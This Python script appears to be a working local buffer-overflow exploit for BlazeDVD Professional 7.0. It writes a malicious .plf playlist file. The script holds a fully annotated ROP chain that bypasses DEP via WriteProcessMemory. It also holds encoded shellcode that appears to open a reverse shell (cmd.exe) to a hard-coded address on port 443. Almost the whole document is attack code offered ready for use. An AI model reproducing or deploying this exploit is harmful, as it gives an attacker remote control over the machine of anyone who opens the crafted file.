import sys, os, time
from struct import pack
def rop():
    """Return the ROP chain as a little-endian byte string.

    Every element of ``ropbuf`` is one 32-bit word: either a gadget address
    (annotated with ``#`` and the gadget's instructions) or an inline operand
    / padding word (mostly annotated with ``##``).  The list is packed in
    order with ``pack("<L", ...)``, so the element order is the chain itself
    and must not be changed.  The addresses are specific to the module and
    product build named in the header below.
    """
    ### ###
    # Software: BlazeDVD Professional 7.0 (load *.plf) Local Buffer Overflow (DEP Bypass)
    # Exploit author: 0x0dee
    # Module used: MediaPlayerCtrl.dll
    # Bad characters: 0x00 0x0a 0x1a
    # API used for the DEP bypass: WriteProcessMemory (WPM)
    # Address of WPM in the import table: 0x640542dc
    # Code cave address: 0x64050dc0
    # Writable address: 0x6406efd0
    ### ###
    ropbuf = [
    0x6402c95f, # nop ; ret ;
    0xffffffff, # offset pad for esp
    0xffffffff,
    0xffffffff,
    0xffffffff,
    ## dereference WriteProcessMemory in import table
    0x640499a7, # pop eax ; ret ;
    0x640542dc, ## WPM import table address
    0x64039d96, # mov eax, dword [eax] ; ret ;
    0x64046c72, # xchg eax, edx ; ret ;
    ## get call_struct address = esp + 204
    ## WPM call address = dword [640542dc]
    0x64025874, # push esp ; pop esi ; ret ;
    0x6404bf22, # mov eax, esi ; pop esi ; ret ;
    0xffffffff, ## pop to esi
    0x640502d4, # pop ecx ; ret ;
    0xfffffdfc, ## 0 - 204
    0x6403ed14, # sub eax, ecx ; ret ;
    0x640506f4, # pop ecx ; ret ;
    0x6406efd0, ## Writable address
    0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
    ## return address = 64050dc0
    0x64040233, # inc eax ; ret ;
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x6405147a, # pop edx ; ret ;
    0x64050dc0, ## code cave for shellcode
    0x640506f4, # pop ecx ; ret ;
    0x6406efd0, ## Writable address
    0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
    # hProcess = -1
    0x64040233, # inc eax ; ret ;
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x6405147a, # pop edx ; ret ;
    0xffffffff, ## -1 for hProcess
    0x640506f4, # pop ecx ; ret ;
    0x6406efd0, ## Writable address
    0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
    # lpBaseaddress = 0x64050dc0
    0x64040233, # inc eax ; ret ;
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x6405147a, # pop edx ; ret ;
    0x64050dc0, ## code cave
    0x640506f4, # pop ecx ; ret ;
    0x6406efd0, ## Writable address
    0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
    # lpBuffer = offset of call_struct + 0x30
    0x64046c72, # xchg eax, edx ; ret ;
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0x6401a3ac, # mov eax, edx ; ret ;
    0x640502d4, # pop ecx ; ret ;
    0xffffffd0, ## -0x30
    0x6403ed14, # sub eax, ecx ; ret ;
    0x64046c72, # xchg eax, edx ; ret ;
    0x6401a3ac, # mov eax, edx ; ret ;
    0x6404c6ff, # pop esi ; ret ;
    0xffffffd4, ## -0x2c
    0x64041797, # add eax, esi ; pop esi ; ret ;
    0xffffffff, ## for pop esi
    0x640506f4, # pop ecx ; ret ;
    0x6406efd0, ## Writable address
    0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
    # nSize = 0x220
    0x64040233, # inc eax ; ret ;
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x64046c72, # xchg eax, edx ; ret ;
    0x64053bf1, # xor eax, eax ; ret ;
    0x640502d4, # pop ecx ; ret ;
    0xfffffde0, ## -0x220
    0x6403ed14, # sub eax, ecx ; ret ;
    0x64046c72, # xchg eax, edx ; ret ;
    0x640506f4, # pop ecx ; ret ;
    0x6406efd0, ## Writable address
    0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
    # [OUT] *lpNumberOfBytesWritten = 0x6406efd0
    0x64040233, # inc eax ; ret ;
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x64040233, # inc eax ; ret ;
    0x6405147a, # pop edx ; ret ;
    0x6406efd0, ## .data writable address
    0x640506f4, # pop ecx ; ret ;
    0x6406efd0, ## Writable address
    0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;
    # call WPM
    0x6403ea41, # sub eax, 0x20 ; pop ebx ; ret ;
    0xffffffff, ## pop to ebx
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0xffffffff, ## for retn 0x0C
    0x64039f50, # add eax, 0x08 ; ret ;
    0x64032313 # push eax ; pop esp ; ret ;
    # Unused gadget candidates left by the author (not part of the chain):
    # 0x6401a3ac, # mov eax, edx ; ret ;
    # 0x6401ccc0, # mov eax, ecx ; ret ;
    # 0x64048d30, # mov eax, ebx ; pop esi ; pop ebx ; ret ;
    # 0x64010341, # add al, 0xFF ; push edx ; pop eax ; pop esi ; ret ;
    # 0x64016676, # xchg eax, ebx ; ret ;
    ]
    # Each word is emitted as a 4-byte little-endian value, in list order.
    return b''.join(pack("<L", _) for _ in ropbuf)
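bufferSize = 0xe10  # 0xf58 -- total size of the generated file
# eip offset : 0n260
# esp offset : 0n280
# badchars : 0x00 0x0a 0x1a
#
# File layout, in order: 260 filler bytes up to the saved EIP, the ROP chain,
# a NOP sled sized so the shellcode lands at a fixed offset, the shellcode,
# then "Z" fill up to bufferSize.
buffer = b""
offsetOfEIP = b"A" * 260
ropbuf = rop()
buffer += offsetOfEIP + ropbuf
# shellcode size: 0x151 (337)
shellcode = b'\x89\xe5\x81\xc4\xf0\xf9\xff\xff\xeb\x06^\x89u\x04\xebN\xe8\xf5\xff\xff\xff`1\xc9d\x8bq0\x8bv\x0c\x8bv\x1cV\x8b^\x08\x0f\xb6F\x1e\x89E\xf8\x8bC<\x8b|\x03x\x01\xdf\x8bO\x18\x8bG \x01\xd8\x89E\xfc\xe3\x1dI\x8bE\xfc\x8b4\x88\x01\xde1\xc0\x8bU\xf8\xfc\xac\x84\xc0t\x0e\xc1\xca\x02\x01\xc2\xeb\xf4\xeb)^\x8b6\xeb\xbd;T$(u\xd6\x8bW$\x01\xdaf\x8b\x0cJ\x8bW\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89D$ ^aYZQ\xff\xe0\xb8\xb4\xb3\xff\xfe\xf7\xd8Ph32.DhWS2_Thhz\xc4v\xffU\x04\x89\xe01\xc9f\xb9\x90\x05)\xc8P1\xc0f\xb8\x02\x02Ph\x96 \x9e\xcc\xffU\x041\xc0PPP\xb0\x06P,\x05P@Phf ^\x81\xffU\x04\x89\xc61\xc0PPh\xc0\xa8\x1f\x03f\xb8\x01\xbb\xc1\xe0\x10f\x83\xc0\x02PT_1\xc0PPPP\x04\x10PWVh\x95 ^W\xffU\x04VVV1\xc0\x8dH\rP\xe2\xfd\xb0DPT_f\xc7G,\x01\x01\xb8\x9b\x87\x9a\xff\xf7\xd8Phcmd.\x89\xe3\x89\xe01\xc9f\xb9\x90\x03)\xc8PW1\xc0PPP@PHPPSPh\xc7(\xaa\x0b\xffU\x041\xc9Qj\xffh\xd2U\xa9.\xffU\x04'
# The sled length is derived from the chain length, so 260 + len(ropbuf) +
# len(sled) is constant (260 + 0x274) whatever the chain size.  Note that a
# negative count here would silently yield b"" rather than fail.
offsetOfshellcode = b"\x90" * (0x204 + 0x30 - len(ropbuf) + 0x40)
buffer += offsetOfshellcode + shellcode
print(f"[ ] rop size {hex(len(ropbuf))}")
# Fill up to the fixed total size (also silently b"" if buffer already exceeds it).
buffer += b"Z" * (bufferSize - len(buffer))
# Context manager replaces the bare open()/close() pair, which left the
# handle open if write() raised.
with open("venom_file.plf", "wb") as out:
    out.write(buffer)
print(f"[+] Write buffer {len(buffer)} bytes.")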